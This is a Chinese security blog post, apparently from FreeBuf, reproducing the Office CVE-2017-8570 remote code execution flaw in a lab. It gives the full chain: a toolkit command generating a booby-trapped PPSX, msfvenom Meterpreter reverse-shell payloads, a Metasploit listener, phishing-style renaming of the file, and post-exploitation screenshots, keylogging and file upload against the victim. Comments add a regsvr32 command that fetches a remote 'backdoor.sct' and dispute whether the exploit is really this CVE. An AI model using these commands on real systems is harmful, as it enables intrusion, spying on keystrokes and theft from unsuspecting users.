微软漏洞

微软漏洞
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
Office CVE-2017-8570远程代码执行漏洞复现 国光2017-08-15金币奖励+15共769751人围观 ，发现 13 个不明物体 漏洞系统安全
CVE-2017-8570漏洞是一个逻辑漏洞，利用方法简单，影响范围广。由于该漏洞和三年前的SandWorm（沙虫）漏洞非常类似，因此我们称之为“沙虫”二代漏洞。详情点我

编号
CVE-2017-8570

影响版本
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
危害
2017年7月，微软在例行的月度补丁中修复了多个Microsoft Office漏洞，其中的CVE-2017-8570漏洞为一个逻辑漏洞，利用方法简单。网上已经出现该漏洞的利用代码，影响范围较广。

该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsoft PowerPoint执行时会初始化Script”Moniker对象，而在PowerPoint播放动画期间会激活该对象，从而执行sct脚本（Windows Script Component）文件。攻击者可以欺骗用户运行含有该漏洞的PPT文件，导致获取和当前登录用户相同的代码执行权限。

复现环境
受害者（靶机）
操作系统: windows 7 sp1 x86
Office版本Office 专业增强版 2016
ip10.0.0.116

攻击者
操作系统Deepin 15.4.1
metasploit版本v4.14.28-dev
ip10.0.0.103

exp
原作者的github链接挂了，暂时就放在了我的github里面:
https://github.com/tezukanice/Office8570.git

参考视频
https://www.youtube.com/watch?v=zpfNf8JTSQM
生成恶意文件
生成恶意PPSX文件
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://10.0.0.103/logo.doc
这里的10.0.0.103是攻击者的ip地址Markdown

生成反弹shell 的 exe 文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.103 LPORT=6666 -f exe > shell.exe
LHOST是攻击者的ip，LPORT这里设置的是监听本机的6666端口

Markdown

这里注意 当攻击目标为64位的操作系统的时候，生成的exe得改为:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.103 LPORT=6666 -f exe > shell.exe
监听会话
监听来自 ppsx 执行反弹 shel
python cve-2017-8570_toolkit.py -M exp -e http://10.0.0.103/shell.exe -l shell.exe
Markdown一开始我这边由于没有切换到root用户导致 权限被拒绝,su切换到root用户解决问题。

msf 的监听
~ msfconsole

msf > use exploit/multi/handler

msf > set LHOST 10.0.0.103

msf > set LPORT 6666

msf > set PAYLOAD windows/meterpreter/reverse_tcp

msf > exploit
同样，这里攻击64位操作系统的时候，得做出如下的调整:

msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
钓鱼攻击
将生成的恶意 Invoice.ppsx 文件重命名为:2017showgirl联系方式.ppsx 复制到目标靶机 windows7系统。

Markdown

然后目标一不小心点开了这个ppt文件的时候:即可在 MSF 反弹 metertprter 的 shell 出来：

Markdown

后续渗透
截图
meterpreter > screenshot
Screenshot saved to: /home/ctf/ccoDxgvg.jpeg
Markdown
正在看b站小姐姐视频～～

键盘记录
meterpreter > keyscan_start # 开启键盘记录
Starting the keystroke sniffer...

meterpreter > keyscan_dump #查看键盘记录内容
Dumping captured keystrokes...

**
-[ C:\soft\SogouExplorer\SogouExplorer.exe
-[ @ 2017年8月13日 4:07:31 UTC
**
xiaojiejie chain<^H><^H><^H>inajoy

meterpreter > keyscan_stop #关闭键盘记录
可以看到win7的主人在搜狗浏览器中输入了如下内容:xiao jie jie chinajoy这里面的<^H> 是删除键 是 回车键

上传文件
meterpreter > upload /home/ctf/Desktop/快别看小姐姐了你被黑啦.txt C:\\users\\gg\\Desktop
把我们的友情提示上传到win7系统主人的 电脑桌面上

ctf@guoguang:~/Desktop$ cat 快别看小姐姐了你被黑啦.txt
整天不是逛B站 就是 逛A站
除了看小姐姐 还是看小姐姐！～～
(严肃脸)我只想对你说 4个字:
请带上我
meterpreter > upload /home/ctf/Desktop/快别看小姐姐了你被黑啦.txt C:\\users\\gg\\Desktop
[*] uploading : home/ctf/Desktop/快别看小姐姐了你被黑啦.txt -> C:\users\gg\Desktop
[*] uploaded : home/ctf/Desktop/快别看小姐姐了你被黑啦.txt -> C:\users\gg\Desktop\快别看小姐姐了你被黑啦.txt
shell
meterpreter > shell
shell 顾名思义就是shell了，这个命令相当于完全控制了windows的cmd命令行，可以执行任意cmd操作，当然只要权限足够大的话。

漏洞修复
及时安装微软2017年7月发布的最新补丁
经得住诱惑，不打开来历不明的office文件如果没有打补丁的话，其实还有一直比较稳妥的打开PPT的方法，就是 不用 双击 打开PPT，打开PPT直接拖动打开 是不会触发运行exe程序的:如下图:
Markdown
结束语
关于这个漏洞复现，youtube上面已经有一些复现案例了，大家可以去参考学习一下。这篇文章我直接参考的是 backlion 的文章，原标题是:Office CVE-2017-8570 远程代码执行漏洞复现,然后在此基础上做了些补充，更加小白化一些，希望可以让小白们轻松地入门metasploit。

国光
国光
7 篇文章
等级： 4级
||
上一篇：BeRoot：一款功能强大的Windows权限提升工具下一篇：系统安全攻防战：DLL注入技术详解
这些评论亮了

361 回复
p牛告诉我github那个8570是个假货，基于0199的，你这个地摊文
)19(亮了
发表评论已有 13 条评论

sdf 2017-08-15回复 1楼
你确定, 这个是8570 ?

亮了(4)

361 2017-08-15回复 2楼
p牛告诉我github那个8570是个假货，基于0199的，你这个地摊文

亮了(19)

fuc 2017-08-15回复 3楼
Could not open socket: Address already in use

亮了(3)

aowhdwodwa 2017-08-15回复 4楼
乌龙的CVE-2017-8570样本及背后的狗血

亮了(1)

dotx88888 (1级) 2017-08-15回复 5楼
乌龙的CVE-2017-8570样本及背后的狗血

亮了(0)

殇花 (1级) 2017-08-15回复 6楼
表示没看懂

亮了(0)

Scoundrel丶You (1级) 2017-08-16回复 7楼
楼主GitHub的那个文件有问题，要重新创建一个template的文件夹，把template.ppsx这个文件要放到里面才可以

亮了(4)

langyajiekou (6级) 2017-08-16回复
@ Scoundrel丶You 问题是你试过本地sct没有？单独激活本地sct可以，但是生成的就是不行。。。

regsvr32 /u /s /i:http://192.168.1.18/backdoor.sct scrobj.dll 可以看到弹calc.exe

但是 python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.1.18/backdoor.sct 生成的ppsx文件在office2016/office2013/office2007都无法成功弹出calc.exe。

亮了(0)

anything24 2017-08-17回复
@ langyajiekou 你能复现成功吗？我本地07都不行

亮了(0)

langyajiekou (6级) 2017-08-17回复
@ anything24 反弹shell可以，但是本地poc通过sct演示弹calc.exe怎么都不成功。

亮了(1)

xiansheng123456 (1级) 2017-09-18回复 8楼

出现这种状况该如何解决啊。总是打不开。

亮了(0)

风若新 (1级) 2017-10-20回复
@ xiansheng123456 看下兼容性什么

亮了(0)

test 2018-04-27回复 9楼
CVE-2017-0199吧.

亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
国光
国光

一只可怜兮兮的Web狗，渴望有朝一日能够Hello the world~

7
文章数
34
评论数
最近文章
Termux高级终端安装使用配置教程
2018.05.08

低成本打造一个高性能的外网Metasploit
2018.04.04

PHP代码安全杂谈
2018.02.04

浏览更多
相关阅读
打开文档变肉鸡：潜伏17年的“噩梦公式”Office漏洞攻击分析2017年恶意Office文档攻击研究报告初探伪装在Office宏里的反弹Shell最新RTF漏洞野外利用分析报告一个换行符引发的奥斯卡0day漏洞(CVE-2017-8759)重现：最新的Office高级威胁攻击预警
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank